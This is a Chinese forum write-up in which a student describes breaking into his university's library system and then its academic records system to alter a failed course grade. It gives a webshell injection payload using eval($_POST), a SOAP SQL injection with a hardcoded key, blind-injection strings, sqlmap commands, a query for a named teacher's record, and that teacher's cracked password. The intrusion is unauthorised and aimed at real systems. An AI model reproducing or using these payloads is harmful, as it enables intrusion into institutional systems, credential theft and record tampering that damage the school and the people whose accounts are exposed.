那真是一个悲伤的故事。
我始终不明白我一个计算机网络专业的学生为什么要学电路,修电脑吗!!那么坑的课,也可能是我逃课次数太多,看我不爽。但是,有一个逃课比我多的孩子,老师给了60分,竟然过了,过了,特么过了。。。
这我就不开心了。呵呵。
事件经历
学校主站给教务查询系统加了一个链接,但通过此处打开教务处,页面全是静态,不能很好的进行测试。猜想在内网内可以,通过教务地址访问。
于是转移目标,先来从图书馆下手,等拿下图书馆,从图书馆代理过去搞。
图书馆乃开源的汇文图书管理系统,敏感信息泄露,呵呵哒:
文件包含漏洞:
登入之后这边可以看到当前连接的数据库的一些信息:
至此我们可以随意修改图书管理系统的配置。
根据开源代码分析,发现更新配置时代码未做过滤,
这样我们可以再在配置文件里插入任意内容,我们可以配置文件里追加一句话;在配置全文索引文件夹路径时,修改
c:/hwopac/index/
为
c:/hwopac/index/";@eval($_POST['123']);//
更新过配置后,内容保存在的配置文件为:
/include/hwopacpwd.php
于是连接`URL+/include/hwopacpwd.php`即可得到一句话webshell。
下面两个图片是在乌云看到的案例:
然而,我们学校图书馆的更新页面却是这样:
握草,怎么会这样。那还真是个悲伤的故事。。。
猜想是运维人员在乌云看到相关案例,删除了该表单。表单被删,貌似无解。
后来抽根烟想了想,能不能去网上找一个一样的系统,然后抓取修改那个修改的POST表单,google了一番,没找到可以利用的。
于是想到自己在页面构造添加表单,如下图的文本输入框:
审查元素插入如下标签:
<dd><input size="20" name="fulltextPath" value="c:/hwopac/index/";@eval($_POST['123']);//" type="text"></dd
此处的表单name值是通过源码审计看到的,案例中也有提现。
我们提交表单抓POST包,发现`fulltextPath`的值已经被提交:
测试连接`/include/hwopacpwd.php`,没有连接上:
我们再来看下这个图,仔细看,
你会发现其实不只是`fulltextPath`的值没有被加密,`user`的值也没有加密,同样可以被替换,于是淫荡的思路来了:
`POST`表单`user`值填写为:
libsys";@eval($_POST['123']);//
提交之后,即可菜刀连接`/include/hwopacpwd.php`,GOOD JOB!
恶意代码确实如此写入:
提权略过,直接`SYSTEM`:
教务系统部署在内网的某台机器,为了防止外部攻击,他们做了一个外部的接口,所有页面静态化,很是蛋疼,我使用上述图书馆的机器对内网的教务机器进行了一通扫描,终于找到了他的实际地址:
正方教务系统同样提供了各类查询接口,我此处利用`service.asmx`的`BMCheckPassword`接口的注入:
官方给出了如下规范的POST数据包:
POST /service.asmx HTTP/1.1
Host: [url]www.baidu.com[/url]
Content-Type: text/xml; charset=utf-8
Content-Length: 784
SOAPAction: "https://www.zf_webservice.com/BMCheckPassword"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns:soapenc="https://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="https://tempuri.org/" xmlns:types="https://tempuri.org/encodedTypes" xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">
<soap:Body soap:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">
<q1:BMCheckPassword xmlns:q1="https://www.zf_webservice.com/BMCheckPassword">
<strYHM xsi:type="xsd:string">string</strYHM>
<strPassword xsi:type="xsd:string">string</strPassword>
<xh xsi:type="xsd:string">string</xh>
<strKey xsi:type="xsd:string">KKKGZ2312</strKey>
</q1:BMCheckPassword>
</soap:Body>
</soap:Envelope>
上述`sKey = "KKKGZ2312"`为常量,有了`sKey`就可以去查询一些接口了。
`strYHM`表示用户名,我已经吓哭,好像都是用拼音:
此处没做过滤,直接构造语句使用Intruder模块:
jwc01' and (SELECT SUBSTR(TO_CHAR(KL),1,1) from yhb where yhm='jwc01')='a`
payoad`为:`a-z`、`A-Z`、`0-9`、`~!@#$%^&*()_+[]{}|<>:"';`
不知为何用BurpSuite跑起来很慢。。
我把POST数据包复制出来交给SQLMAP:
python sqlmap.py -r post.txt
GOOD JOB!
[14:31:40] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB, ZFXFZB'
[14:31:40] [INFO] the SQL query used returns 3389 entries
那么问题来了,几千个表,怎么找教师用户密码的表?幸亏我拼音好:
我挂科的是电子电工,老师叫张X,姓名对应的字段为XM,这拼音拼的啊。。。
这就好办了,用`--sql-shell`查询:
select * from "YHB" where XM = '张X';
恩~,得到密文为`U_rBKJ`,这是经过正方的特殊加密的,我们用python脚本解开:
promote pythonDemo v5est0r$ python zhengfang.py "U_rBKJ"Password: 716822
`Password: 716822`
接着登入该老师的教务系统,录入成绩。。。
录入成绩需要密码,密码??? 我根据官方给出的录入成绩密码字段没查到密码啊。。。空的也不行。
不急,慢慢来。
太悲伤了,补考估计也会挂掉,太悲伤了。
作者:Binghe
来源:i春秋社区
链接:https://bbs.ichunqiu.com/thread-18011-1-1.html
炼石信息安全培训春季班开招
QQ:495066536
372806985
敬请持续关注……
评论列表